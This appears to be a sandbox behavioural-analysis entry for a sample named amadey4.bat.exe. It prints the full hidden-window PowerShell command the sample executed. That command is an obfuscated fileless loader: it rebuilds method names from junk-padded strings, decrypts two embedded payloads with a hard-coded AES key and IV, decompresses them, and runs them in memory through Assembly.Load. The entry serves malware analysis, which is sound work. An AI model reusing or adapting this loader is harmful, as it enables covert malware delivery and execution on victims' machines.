Behavioral Analysis

amadey4.bat.exe "C:\Users\test22\AppData\Local\Temp\amadey4.bat.exe" -w hidden -c $WktQ='EleHaYumeHaYuntAtHaYu'.Replace('HaYu', '');$ZDaV='InHaYuvHaYuokeHaYu'.Replace('HaYu', '');$uiBT='RHaYueadHaYuLiHaYunesHaYu'.Replace('HaYu', '');$alcO='CreHaYuateHaYuDeHaYucrHaYuypHaYutHaYuorHaYu'.Replace('HaYu', '');$emYH='LHaYuoaHaYudHaYu'.Replace('HaYu', '');$ThiF='EntrHaYuyHaYuPoHaYuintHaYu'.Replace('HaYu', '');$mwET='SplHaYuitHaYu'.Replace('HaYu', '');$MPwy='MHaYuaiHaYunMoHaYudHaYuuleHaYu'.Replace('HaYu', '');$YRdj='GeHaYutCuHaYurHaYurenHaYutProHaYucesHaYusHaYu'.Replace('HaYu', '');$PtWD='THaYuranHaYusfoHaYurmFHaYuinHaYualBlHaYuocHaYukHaYu'.Replace('HaYu', '');$puzA='FHaYuroHaYumBaHaYusHaYue6HaYu4StHaYuriHaYungHaYu'.Replace('HaYu', '');$IsrV='ChHaYuangeHaYuExtHaYuenHaYusionHaYu'.Replace('HaYu', '');function BRGtW($xWdDb){$KfUES=[System.Security.Cryptography.Aes]::Create();$KfUES.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KfUES.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KfUES.Key=[System.Convert]::$puzA('Abgya86TAzO0c6x3qocdB19803p/rSZfBL0/YaEmp+w=');$KfUES.IV=[System.Convert]::$puzA('Ut92tqF5+KP4+PJZCsxZDw==');$HSoSl=$KfUES.$alcO();$LMpkz=$HSoSl.$PtWD($xWdDb,0,$xWdDb.Length);$HSoSl.Dispose();$KfUES.Dispose();$LMpkz;}function nwDkE($xWdDb){$BgtLg=New-Object System.IO.MemoryStream(,$xWdDb);$hrrMm=New-Object System.IO.MemoryStream;$vXJVa=New-Object System.IO.Compression.GZipStream($BgtLg,[IO.Compression.CompressionMode]::Decompress);$vXJVa.CopyTo($hrrMm);$vXJVa.Dispose();$BgtLg.Dispose();$hrrMm.Dispose();$hrrMm.ToArray();}$xiSON=[System.Linq.Enumerable]::$WktQ([System.IO.File]::$uiBT([System.IO.Path]::$IsrV([System.Diagnostics.Process]::$YRdj().$MPwy.FileName, $null)), 1);$wcZuI=$xiSON.Substring(2).$mwET(':');$bfeks=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[0])));$OUhkQ=nwDkE (BRGtW ([Convert]::$puzA($wcZuI[1])));[System.Reflection.Assembly]::$emYH([byte[]]$OUhkQ).$ThiF.$ZDaV($null,$null);[System.Reflection.Assembly]::$emYH([byte[]]$bfeks).$ThiF.$ZDaV($null,$null);